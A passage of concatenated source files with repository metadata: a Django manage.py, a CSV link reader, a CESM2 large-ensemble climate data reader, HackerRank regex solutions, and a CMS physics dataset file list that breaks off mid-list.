0d7ef97c64cbb51cb2f664c2765cc5b6d54098a1 | 09aee268ce72d282f53fe94f42478e2b3b48127d | /CBVProject_3/manage.py | ba051715cec14ce97e5ac0aec7233658f5f881dd | [] | no_license | keshava519/Django_Projects | c95d0f8c55d4cc946291be6fb058b7298aefe596 | 99584892b9d9ec6b6395a382c684b4d036d07874 | refs/heads/main | 2023-02-23T03:44:32.110742 | 2021-01-27T15:15:13 | 2021-01-27T15:15:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 810 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "CBVProject_3.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| [
"keshava.cadcam@gmail.com"
] | keshava.cadcam@gmail.com |
8064c42bc3d64fe11d2c1fd47af31b2a447da64d | 02b73216f3970a981dc4bb8eea67f876edc8797f | /funcs.py | fe84dcb18d1b1a6db59299839394a4877e94586a | [] | no_license | Coul33t/LinkReader | b44eff04a8979af3884e70ccbe165ee9d8e7ae8c | 7396fc8888eec7182783f5cb08e338dbac314637 | refs/heads/master | 2020-04-19T14:49:18.764694 | 2019-02-01T00:10:20 | 2019-02-01T00:10:20 | 168,254,995 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,601 | py | import csv
import random as rn
import pdb
from constants import VIDEO_LIST
class LinkReader:
def __init__(self):
self.links = []
def has_links(self):
return len(self.links)
def import_links(self, csv_file):
with open(csv_file, newline='') as csvfile:
contents = csv.reader(csvfile, delimiter=' ', quotechar='|')
# return a list containing [link, fav or like, image or video)]
self.links.extend([{'link': row[0].split(',')[1], 'category':row[0].split(',')[2], 'content_type':'video' if any(n in row[0].split(',')[1] for n in VIDEO_LIST) else 'image'} for row in contents])
def get_links(self, beg=0, end=50, category=None, link_only=True):
if not category:
if link_only:
return [list(link.keys())[0] for link in self.links[beg:end]]
else:
return self.links[beg:end]
def get_random_link(self, number=1, category=None, link_only=True, content_type=None):
sub_list = self.links.copy()
if category:
sub_list = [x['link'] for x in sub_list.items() if x['category'] == category]
if content_type:
sub_list = [x['link'] for x in sub_list.items() if x['content_type'] == content_type]
rn_list = rn.sample(range(len(sub_list)), number)
if link_only:
return [sub_list[i]['link'] for i in rn_list]
return [sub_list[i] for i in rn_list]
if __name__ == '__main__':
l_r = LinkReader()
l_r.import_links('favorites.csv')
l_r.import_links('likes.csv')
pdb.set_trace() | [
"Coulis1990@gmail.com"
] | Coulis1990@gmail.com |
edf872d10b298121ef5d6521f18b67f5da91035e | e40381a0aa3320616e5a5b82533c2c5cfe0fa2ce | /Scripts/read_CESM2LE.py | 249135375ede80d7dabbc6d87de8ba81b7b0899b | [
"MIT"
] | permissive | zmlabe/predictGMSTrate | 7220b26f86839699635fe2f04e45348095183bc7 | ac4238c7f1c33dc9d30382e4dbdc26a2f63352f5 | refs/heads/main | 2023-04-10T03:46:16.053123 | 2023-01-11T14:08:27 | 2023-01-11T14:08:27 | 396,942,451 | 4 | 3 | MIT | 2022-01-19T22:15:19 | 2021-08-16T19:30:55 | Python | UTF-8 | Python | false | false | 8,653 | py | """
Function(s) reads in monthly data from CESM2-LE for different variables
using # of ensemble members for all time periods
Notes
-----
Author : Zachary Labe
Date : 25 June 2021
Usage
-----
[1] read_CESM2LE(directory,vari,sliceperiod,sliceshape,slicenan,numOfEns,timeper)
"""
def read_CESM2LE(directory,vari,sliceperiod,sliceshape,slicenan,numOfEns,timeper):
"""
Function reads monthly data from CESM2-LE
Parameters
----------
directory : string
path for data
vari : string
variable for analysis
sliceperiod : string
how to average time component of data
sliceshape : string
shape of output array
slicenan : string or float
Set missing values
numOfEns : number of ensembles
integer
timeper : time period of analysis
string
Returns
-------
lat : 1d numpy array
latitudes
lon : 1d numpy array
longitudes
var : numpy array
processed variable
Usage
-----
read_CESM2LE(directory,vari,sliceperiod,sliceshape,
slicenan,numOfEns,timeper)
"""
print('\n>>>>>>>>>> STARTING read_CESM2LE function!')
### Import modules
import numpy as np
from netCDF4 import Dataset
import calc_Utilities as UT
###########################################################################
### Parameters
time = np.arange(1850,2100+1,1)
mon = 12
ens1 = np.arange(1,10+1,1)
ens2 = np.arange(21,50+1,1)
ens = np.append(ens1,ens2)
###########################################################################
### Read in data
membersvar = []
for i,ensmember in enumerate(ens):
filename = directory + '%s/%s_%s_1850-2100.nc' % (vari,vari,
ensmember)
data = Dataset(filename,'r')
lat1 = data.variables['latitude'][:]
lon1 = data.variables['longitude'][:]
var = data.variables['%s' % vari][:,:,:]
data.close()
print('Completed: read *CESM2-LE* Ensemble Member --%s-- %s' % (ensmember,vari))
membersvar.append(var)
del var
membersvar = np.asarray(membersvar)
ensvalue = np.reshape(membersvar,(len(ens),time.shape[0],mon,
lat1.shape[0],lon1.shape[0]))
del membersvar
print('Completed: read all CESM2-LE Members!\n')
###########################################################################
### Slice over months (currently = [ens,yr,mn,lat,lon])
### Shape of output array
if sliceperiod == 'annual':
ensvalue = np.nanmean(ensvalue,axis=2)
if sliceshape == 1:
ensshape = ensvalue.ravel()
elif sliceshape == 4:
ensshape = ensvalue
print('Shape of output = ', ensshape.shape,[[ensshape.ndim]])
print('Completed: ANNUAL MEAN!')
elif sliceperiod == 'DJF':
ensshape = np.empty((ensvalue.shape[0],ensvalue.shape[1]-1,
lat1.shape[0],lon1.shape[0]))
for i in range(ensvalue.shape[0]):
ensshape[i,:,:,:] = UT.calcDecJanFeb(ensvalue[i,:,:,:,:],
lat1,lon1,'surface',1)
print('Shape of output = ', ensshape.shape,[[ensshape.ndim]])
print('Completed: DJF MEAN!')
elif sliceperiod == 'MAM':
enstime = np.nanmean(ensvalue[:,:,2:5,:,:],axis=2)
if sliceshape == 1:
ensshape = enstime.ravel()
elif sliceshape == 4:
ensshape = enstime
print('Shape of output = ', ensshape.shape,[[ensshape.ndim]])
print('Completed: MAM MEAN!')
elif sliceperiod == 'JJA':
enstime = np.nanmean(ensvalue[:,:,5:8,:,:],axis=2)
if sliceshape == 1:
ensshape = enstime.ravel()
elif sliceshape == 4:
ensshape = enstime
print('Shape of output = ', ensshape.shape,[[ensshape.ndim]])
print('Completed: JJA MEAN!')
elif sliceperiod == 'SON':
enstime = np.nanmean(ensvalue[:,:,8:11,:,:],axis=2)
if sliceshape == 1:
ensshape = enstime.ravel()
elif sliceshape == 4:
ensshape = enstime
print('Shape of output = ', ensshape.shape,[[ensshape.ndim]])
print('Completed: SON MEAN!')
elif sliceperiod == 'JFM':
enstime = np.nanmean(ensvalue[:,:,0:3,:,:],axis=2)
if sliceshape == 1:
ensshape = enstime.ravel()
elif sliceshape == 4:
ensshape = enstime
print('Shape of output = ', ensshape.shape,[[ensshape.ndim]])
print('Completed: JFM MEAN!')
elif sliceperiod == 'AMJ':
enstime = np.nanmean(ensvalue[:,:,3:6,:,:],axis=2)
if sliceshape == 1:
ensshape = enstime.ravel()
elif sliceshape == 4:
ensshape = enstime
print('Shape of output = ', ensshape.shape,[[ensshape.ndim]])
print('Completed: AMJ MEAN!')
elif sliceperiod == 'JAS':
enstime = np.nanmean(ensvalue[:,:,6:9,:,:],axis=2)
if sliceshape == 1:
ensshape = enstime.ravel()
elif sliceshape == 4:
ensshape = enstime
print('Shape of output = ', ensshape.shape,[[ensshape.ndim]])
print('Completed: JAS MEAN!')
elif sliceperiod == 'OND':
enstime = np.nanmean(ensvalue[:,:,9:,:,:],axis=2)
if sliceshape == 1:
ensshape = enstime.ravel()
elif sliceshape == 4:
ensshape = enstime
print('Shape of output = ', ensshape.shape,[[ensshape.ndim]])
print('Completed: OND MEAN!')
elif sliceperiod == 'none':
if sliceshape == 1:
ensshape = ensvalue.ravel()
elif sliceshape == 4:
ensshape= np.reshape(ensvalue,(ensvalue.shape[0],ensvalue.shape[1]*ensvalue.shape[2],
ensvalue.shape[3],ensvalue.shape[4]))
elif sliceshape == 5:
ensshape = ensvalue
print('Shape of output =', ensshape.shape, [[ensshape.ndim]])
print('Completed: ALL RAVELED MONTHS!')
###########################################################################
### Change missing values
if slicenan == 'nan':
ensshape[np.where(np.isnan(ensshape))] = np.nan
ensshape[np.where(ensshape < -999)] = np.nan
print('Completed: missing values are =',slicenan)
else:
ensshape[np.where(np.isnan(ensshape))] = slicenan
ensshape[np.where(ensshape < -999)] =slicenan
###########################################################################
### Change units
if any([vari=='SLP',vari=='PS']):
ensshape = ensshape/100 # Pa to hPa
print('Completed: Changed units (Pa to hPa)!')
elif any([vari=='T2M',vari=='SST']):
ensshape = ensshape - 273.15 # K to C
print('Completed: Changed units (K to C)!')
elif any([vari=='PRECL',vari=='PRECC',vari=='PRECT']):
ensshape = ensshape * 8.64e7 # m/s to mm/day
### "Average Monthly Rate of Precipitation"
print('*** CURRENT UNITS ---> [[ mm/day ]]! ***')
###########################################################################
### Select years of analysis (1850-2100)
if timeper == 'all':
print('ALL SIMULATION YEARS')
print(time)
histmodel = ensshape
elif timeper == 'historical':
yearhistq = np.where((time >= 1950) & (time <= 2019))[0]
print('HISTORICAL YEARS')
print(time[yearhistq])
histmodel = ensshape[:,yearhistq,:,:]
elif timeper == 'future':
yearhistq = np.where((time >= 2020) & (time <= 2099))[0]
print('FUTURE YEARS')
print(time[yearhistq])
histmodel = ensshape[:,yearhistq,:,:]
elif timeper == 'hiatus':
yearhistq = np.where((time >= 1979) & (time <= 2099))[0]
print('HIATUS YEARS')
print(time[yearhistq])
histmodel = ensshape[:,yearhistq,:,:]
print('Shape of output FINAL = ', histmodel.shape,[[histmodel.ndim]])
print('>>>>>>>>>> ENDING read_CESM2LE function!')
return lat1,lon1,histmodel
# ### Test functions - do not use!
# import numpy as np
# import matplotlib.pyplot as plt
# import calc_Utilities as UT
# directory = '/Users/zlabe/Data/CESM2-LE/monthly/'
# vari = 'OHC100'
# sliceperiod = 'annual'
# sliceshape = 4
# slicenan = 'nan'
# numOfEns = 40
# timeper = 'all'
# lat,lon,var = read_CESM2LE(directory,vari,sliceperiod,sliceshape,slicenan,numOfEns,timeper)
# lon2,lat2 = np.meshgrid(lon,lat)
# ave2 = UT.calc_weightedAve(var,lat2)
| [
"zmlabe@rams.colostate.edu"
] | zmlabe@rams.colostate.edu |
3480b284dcaed2749f6f58fa86e06e8053cb57ff | 81fe7f2faea91785ee13cb0297ef9228d832be93 | /HackerRank/Contests/RegularExpresso2.py | cb6b298b2549f14cd035b21bfb764ca316fc44b7 | [] | no_license | blegloannec/CodeProblems | 92349c36e1a35cfc1c48206943d9c2686ea526f8 | 77fd0fa1f1a519d4d55265b9a7abf12f1bd7d19e | refs/heads/master | 2022-05-16T20:20:40.578760 | 2021-12-30T11:10:25 | 2022-04-22T08:11:07 | 54,330,243 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,107 | py | #!/usr/bin/env python
import sys
import re
#Regex_Pattern = r'(te|b|a|t|r)$'
#Regex_Pattern = r'^(A{1,3})?(a{1,3}A{1,3})*(a{1,3})?$'
#Regex_Pattern = r'(.)\1\1.{,2}.{20}$|(.)\2\2.{,2}.{15}$|(.)\3\3.{,2}.{10}$|(.)\4\4.{,2}.{5}$|(.)\5\5.{,2}$|(.).{4}\6.{4}\6'
#Regex_Pattern = r'10(11|00)*$'
Regex_Pattern = r'(00|11(10(11)*00)*01)*'
#Regex_Pattern = r'(?=^.{20}$)(?!^.*\n)(?=^.*[a-z])(?=^.*[A-Z].*[A-Z])(?!^(..)*0)(?!^1)(?!^.{3}1)(?!^.{5}1)(?!^.{7}1)(?!^.{8}1)(?!^.{9}1)(?!^.{11}1)(?!^.{13}1)(?!^.{14}1)(?!^.{15}1)(?!^.{17}1)(?!^.{19}1)(?!^2)(?!^.*2$)(?!^.*345)(?!^.*354)(?!^.*435)(?!^.*453)(?!^.*534)(?!^.*543)(?!^(..)*.6)(?!^.*7.*7)(?!^.*8.*8.*8)(?!^.*9.*9.*9.*9)'
#Regex_Pattern = r'(?=^([^ab]*a[^ab]*b([^ab]*b[^ab]*a)*)*[^ab]*$|^([^ab]*b[^ab]*a([^ab]*a[^ab]*b)*)*[^ab]*$)(?=^([^cd]*c[^cd]*d([^cd]*d[^cd]*c)*)*[^cd]*$|^([^cd]*d[^cd]*c([^cd]*c[^cd]*d)*)*[^cd]*$)'
#Regex_Pattern = r'(?=.*P)(?!.*P.*P)(?=^(R(RL|UD|RT(UD|TT)*UL(LR|RL|P)*RD(UD+TT)*TL|RT(UD|TT)*UL(LR|RL|P)*LJD)*L)*$)'
print len(Regex_Pattern)
for l in sys.stdin.readlines():
print str(bool(re.search(Regex_Pattern, l))).lower()
| [
"blg@gmx.com"
] | blg@gmx.com |
1c69f26854c7dc8b97a6f5b1a112887dee9bc0a5 | 993ef8924418866f932396a58e3ad0c2a940ddd3 | /Production/python/Summer20UL18/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8_cff.py | cd36dfc4221d14a5c4af6bbf425f9b192d53e09f | [] | no_license | TreeMaker/TreeMaker | 48d81f6c95a17828dbb599d29c15137cd6ef009a | 15dd7fe9e9e6f97d9e52614c900c27d200a6c45f | refs/heads/Run2_UL | 2023-07-07T15:04:56.672709 | 2023-07-03T16:43:17 | 2023-07-03T16:43:17 | 29,192,343 | 16 | 92 | null | 2023-07-03T16:43:28 | 2015-01-13T13:59:30 | Python | UTF-8 | Python | false | false | 89,463 | py | import FWCore.ParameterSet.Config as cms
maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
readFiles = cms.untracked.vstring()
secFiles = cms.untracked.vstring()
source = cms.Source ("PoolSource",fileNames = readFiles, secondaryFileNames = secFiles)
readFiles.extend( [
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/120000/5E487166-449F-9044-963E-438A0F76C8CC.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/02BA3D25-71BE-A24E-AF31-A3E0014D4B2D.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/034A9BA1-AB34-3348-BB2F-EB6895D8CFE9.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/04C2BF5A-7141-5C42-A2F2-4EDCECFB6D7A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/06CD4088-EE68-EB44-BDCD-16B905F184CD.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/0906507E-7F13-FC44-999E-303122D26AFB.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/10EED063-2574-474A-AF18-C2F2C314CD59.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/17F498D4-22E7-B048-B3C7-5DF147955068.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/1D3FD3A3-31C9-4342-9559-252CAB598102.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/1D7FF9EE-3DED-CD4E-A4FD-7FCE22130479.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/1E13D8DA-13CD-6545-962E-969427053E10.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/1EC2CF25-9C9B-1A41-BB8A-3C5502F0800F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/235A8519-5CFC-F148-A9E0-326CE8D46067.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/24C2F20F-06D7-A249-AC23-8DCFA783C23F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/24F338BF-5AF1-B649-93E1-A9F18481EFA9.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/28E32658-BD55-584C-BB2B-3BDDBC57FBEA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/28EAE368-1304-D24C-9477-F69E191452B2.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/2ABC56F6-4AEC-A649-A7D2-6BC1CB2F87E9.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/2C0AC2AE-1BC7-2144-8C3A-7531185E2254.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/2D0D429A-B95A-0C41-8677-FB7397DE9C3E.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/33D1FF0A-7EC6-044B-B84F-061646D8DF65.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/35D1D197-F10A-2548-A9EF-C8944F101A86.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/39047BB9-7FD4-4243-B7F7-3E697A4B4778.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/519BBC54-8576-C440-A9A3-BC15FA2611BA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/539A9F8D-AFF6-994F-8509-AA838986D3F9.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/55D35C0D-4D56-D34F-BA5D-DF310C6DDE0F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/57652518-3911-5044-AE6B-38EBA145C485.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/5799039A-9735-D140-B21C-71BB74DC5555.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/5FA433C7-340B-B14F-8C8B-23C3DD0043DF.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/60A7E4FC-BD61-A245-AFF5-755E65D840BB.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/60DA800F-8D24-2E41-88E2-C76363471D61.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/61922E71-2776-A748-824A-DD24F045426B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/631A842C-36FE-B443-AF43-194D232802D0.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/6372F3CB-1ACB-9940-870D-F57E96D1B730.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/64485CFE-EF61-BA42-BE12-E7AB4E17F237.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/665DF56F-F543-7C44-8EBE-8FF532424958.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/6CBED4C2-6CA5-1543-ACFB-410058363BE5.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/6EF6E61C-17EC-6A48-A4DC-1D4F4EF9EE01.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/6FEEAD1C-F0C5-F845-BA18-40559F6E2131.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/771F11D9-3378-D149-89A4-1A3C72A44C61.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/7D611D18-9102-4249-BFAA-62E326FC5F54.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/8041302E-E7E4-DE4B-AC51-83F4131C73A2.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/84945C36-38C7-FF44-9969-0471F9393C08.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/85E9C311-BD09-2249-AE05-71B3B3F5F13A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/88CFA843-547F-654E-AC48-216CAECD3805.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/8BA250F3-EB6E-0747-9768-1EA1E0AF794F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/92CFBF74-0123-8D49-8587-064FA9EA4AAE.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/92DA11BF-A42B-3E4F-A9B5-0608DC5E0153.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/93894D11-91D7-8A4B-89DA-0DA5AC024109.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/9C5D6912-BB4A-9847-A3A1-1053B6EDF67A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/9C93C234-421C-444E-8465-068B548F9652.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/9CFE932E-58D0-D046-BE91-8FF941278909.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/9E9F8B71-1576-AB48-B729-FA911D410474.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/A03ECAFF-663A-6C43-A150-3A9D375C9283.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/A25B37FF-D52B-0A4E-A4C0-398291AF9AFF.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/A50B4C8B-E5CF-2B48-B6DF-D177C6B1EA9D.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/A76713A6-2E9A-C44E-A4AC-9FEDEA6E7E86.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/B2C43670-11EB-B141-9C05-D240812234DE.root',
